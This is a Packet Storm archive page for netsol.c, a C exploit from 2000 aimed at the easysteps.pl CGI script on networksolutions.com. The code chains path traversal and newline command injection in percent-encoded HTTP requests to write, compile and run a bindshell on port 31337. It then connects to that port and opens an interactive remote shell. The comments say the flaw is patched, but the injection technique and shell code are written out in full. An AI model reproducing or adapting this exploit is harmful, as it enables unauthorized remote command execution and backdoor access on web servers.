exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

netsol.c

netsol.c
Posted May 11, 2000
Authored by r00tabega, Bansh33 | Site r00tabega.com

Exploit for the (patched) major security issue with networksolutions.com(easysteps.pl) which would have set up a bindshell if it had been run.

SHA-256 | 9341f14a0079af7d87506afc61d98b1ef1589d7eeb8b50a03d204c3b48807cbf

netsol.c

Change Mirror Download
/* 
* [r00tabega.security.labs]
* www.r00tabega.com
* Coded for the network solutions exploit (http://packetstorm.securify.com/0005-exploits/netsolbug.txt)
* Unfortunately, this no longer works.
* coded by bansh33 [rishi@felons.org]
* Binds a shell to port 31337
*/

#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/types.h>
#include <time.h>
#include <sys/time.h>
#include <unistd.h>

#define TRUE 0x00000001
#define FALSE 0x00000000
#define ERR 0xffffffff

typedef long sock_t;
typedef u_long ip_t;
typedef u_short port_t;

#define H1 "GET /cgi-bin/makechanges/easysteps/easysteps.pl?STRING=null&FILE=/../../../../../../../x%0aecho%20%27%23%69%6e%63%6c%75%64%65%20%22%2f%75%73%72%2f%69%6e%63%6c%75%64%65%2f%73%79%73%2f%73%6f%63%6b%65%74%2e%68%22%27%20>%20hi.c|"
#define H2 "GET /cgi-bin/makechanges/easysteps/easysteps.pl?STRING=null&FILE=/../../../../../../../x%0aecho%20%27%23%69%6e%63%6c%75%64%65%20%22%2f%75%73%72%2f%69%6e%63%6c%75%64%65%2f%6e%65%74%69%6e%65%74%2f%69%6e%2e%68%22%27>>%20hi.c"
#define CODE "GET /cgi-bin/phf?Qalias=x%0aecho%20%27%69%6e%74%20%6d%61%69%6e%28%29%7b%73%74%72%75%63%74%20%73%6f%63%6b%61%64%64%72%5f%69%6e%20%73%61%3b%69%6e%74%20%73%3d%73%6f%63%6b%65%74%28%32%2c%31%2c%30%29%3b%73%61%2e%73%69%6e%5f%61%64%64%72%2e%73%5f%61%64%64%72%3d%30%3b%73%61%2e%73%69%6e%5f%66%61%6d%69%6c%79%3d%32%3b%73%61%2e%73%69%6e%5f%70%6f%72%74%3d%32%37%30%30%32%3b%62%69%6e%64%28%73%2c%28%73%74%72%75%63%74%20%73%6f%63%6b%61%64%64%72%20%2a%29%26%73%61%2c%31%36%29%3b%6c%69%73%74%65%6e%28%73%2c%33%29%3b%77%68%69%6c%65%28%31%29%7b%69%6e%74%20%66%64%3d%61%63%63%65%70%74%28%73%2c%28%73%74%72%75%63%74%20%73%6f%63%6b%61%64%64%72%20%2a%29%26%73%61%2c%31%36%29%3b%64%75%70%32%28%66%64%2c%30%29%3b%64%75%70%32%28%66%64%2c%31%29%3b%64%75%70%32%28%66%64%2c%32%29%3b%73%79%73%74%65%6d%28%22%2f%62%69%6e%2f%62%61%73%68%22%29%3b%7d%7d%27%20>>hi.c|"
#define COMPILE "GET /cgi-bin/makechanges/easysteps/easysteps.pl?STRING=null&FILE=/../../../../../../../%0agcc%20-o%20hi%20hi.c|"
#define THEHACK "GET /cgi-bin/makechanges/easysteps/easysteps.pl?STRING=null&FILE=/../../../../../../../%0a%2e%2f%68%69%20|"
#define WHOAMI "uname -a; id;\n"

int main (int, char * *);
void simshell (int);
void send_tcp_conn (char *, ip_t, port_t, int);
sock_t tcp_conn (ip_t, port_t);
ip_t resolve (u_char *);

int main (int argc, char * * argv)
{
sock_t fd;
ip_t ipaddr;


if ((ipaddr = resolve("networksolutions.com")) == ERR)
{
fprintf(stderr, "Couldn't resolve networksolutions.com.\n");
exit(EXIT_SUCCESS);
}

fprintf(stderr, "Network Solutions Exploit by bansh33\n");
fprintf(stderr, "i take no responsibility for this\n\n");
fprintf(stderr, "Owning networksolutions.com: ");

send_tcp_conn(H1, ipaddr, 80, 0);
fprintf(stderr, ".");
send_tcp_conn(H2, ipaddr, 80, 0);
fprintf(stderr, ".");
send_tcp_conn(CODE, ipaddr, 80, 0);
fprintf(stderr, ".");
send_tcp_conn(COMPILE, ipaddr, 80, 0);
fprintf(stderr, ".");
send_tcp_conn(THEHACK, ipaddr, 80, 1);
fprintf(stderr, ".");

fprintf(stderr, "\nDropping you to a shell...\n");

fd = tcp_conn(ipaddr, 31337);
send(fd, WHOAMI, strlen(WHOAMI), 0);
simshell(fd);
}

void simshell (int fd)
{
char buf[255];
fd_set in_set;

while (1)
{
FD_ZERO(&in_set);
FD_SET(0, &in_set);
FD_SET(fd, &in_set);

if ((select(fd + 1, &in_set, 0, 0, NULL)))
{
if (FD_ISSET(fd, &in_set))
{
memset(buf, 0, 255);
recv(fd, buf, 255, 0);
if (!*buf) exit(EXIT_SUCCESS);
fprintf(stderr, buf);
}
else if (FD_ISSET(0, &in_set))
{
memset(buf, 0, 255);
read(0, buf, 255);
send(fd, buf, strlen(buf), 0);
}
}
}
}

void send_tcp_conn (char * buf, ip_t ipaddr, port_t port, int dis)
{
sock_t fd;

if ((fd = tcp_conn(ipaddr, port)) > 0)
send(fd, buf, strlen(buf), 0);
if (!dis) close(fd);
}

sock_t tcp_conn (ip_t addr, port_t port)
{
sock_t ret;
struct sockaddr_in sa;

sa.sin_addr.s_addr = addr;
sa.sin_port = htons(port);
sa.sin_family = AF_INET;

if ((ret = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == ERR)
return (ERR);

else if ((connect(ret, (struct sockaddr *)&sa, sizeof(struct
sockaddr_in))) == ERR) return (ERR);

return (ret);
}

ip_t resolve (u_char * host)
{
struct in_addr addr;
struct hostent * hp;

if ((addr.s_addr = inet_addr(host)) == ERR)
{
if (!(hp = gethostbyname(host))) return (ERR);
memcpy(&addr.s_addr, hp->h_addr, hp->h_length);
}
return (addr.s_addr);
}

/* EOF */
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close